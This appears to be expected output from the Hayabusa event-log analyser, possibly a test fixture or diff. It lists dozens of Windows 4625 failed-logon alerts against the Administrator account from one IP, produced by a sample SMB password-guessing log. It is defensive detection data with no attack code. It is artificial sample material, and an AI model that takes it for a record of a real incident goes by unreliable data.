+2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8FYOF6HxJHqm7GW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9tBtz1GYn5J8sbFH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qn8PlxEzIu9AKUgt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdjqlNDU3U150UAw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esaTfuwuiFAkIVs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y4LbVQ5ytgVCqFmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rWoX76sgYTVwxkD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQFJRRYn6sjYK5cD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wyVuBGEFGJqImQ7W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pRvnyVGxG8i0e3PQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X6Hv2fj43a8j1O2P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: myP4zVFyw2qE1SV7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lpmBcVilH72dYF7E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jd9hKGDxLcnZphlL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OmXgOD9kaGJ4PIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BpQtWW0fAEzNH28B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EgNkY8LKSWcnLM00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8S1dUwb3HjOnEs9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49ZKcnswdISJDwbS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qOuYmww71pTM0l3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PUHoGgmXKRJknRZG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6yf8LSkcwBP9s1mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmH2AMDmkZVbCt8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I23o9EQLpPpn9RlY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrEVj3DB1prpOtnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Iau1IHKxWRsqQaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdPC9LVhZS2l27XF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxcofRpjCFme3mg2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e1VnQLbETh1GgX0c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbdPYXx8mx4SV9G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcv3HWid3auIu7cY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2OviUvdOmk5HON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bVBSORhgFwTy2TWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DsIhCEZcfYenufvf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDadVFtE4toNiagy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnydJjDBdzJWqmWa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW8im2IhNzrGoSFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTzlqq9HLEX6wzdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz98aGXd0fdVzmTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2zOy64cp6dXelNl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X1BflxNjQRNopjb4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 401ulFeuzCtp5lPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p0SIzJrzkseFB1j8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cyQMxtEdbud8iJLI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gbjIqxD4E6fYsGx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEeZEcj63sBddCsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiATfqYtrH9LoqR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PG3HB3GqFwQFLdcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G8NU6WRdrq9DxM6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cvZKIkI2aeBzbwe0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EE7AL3nJ7qsnk4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feu34D0VvoMrnWzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrNRIpCpmAV3npax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zpxgEvvoC0stFdTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XvpDKRAPDS36sqNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4cqJKEIySxiQdCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm1F7QEwBE054ui0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvIjhyfdlXiX72Es | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJilW4KgIEeh5VNr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Ka0FYYdVOj90l0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9ZjGE8T6RuGx8SZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkti4BGVrpoAQRBL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZy2YJPOg1YZ2bd0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUE6E9H9i0l0P7Jp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Pkpt2nmRorQ3x0o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCZNNzSyi4mLLaxZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O9ZqF43sDjSirvMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XOw9DjHISDX57XUe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rmxFpEQeGsgbXpDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfIVCOOWQS7TNKQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uweLaLhvznDee1IF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oNQcS2BonF12ikiX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D43Flf2keSL3aph6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zw7nJXNHZ2QNa3In | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
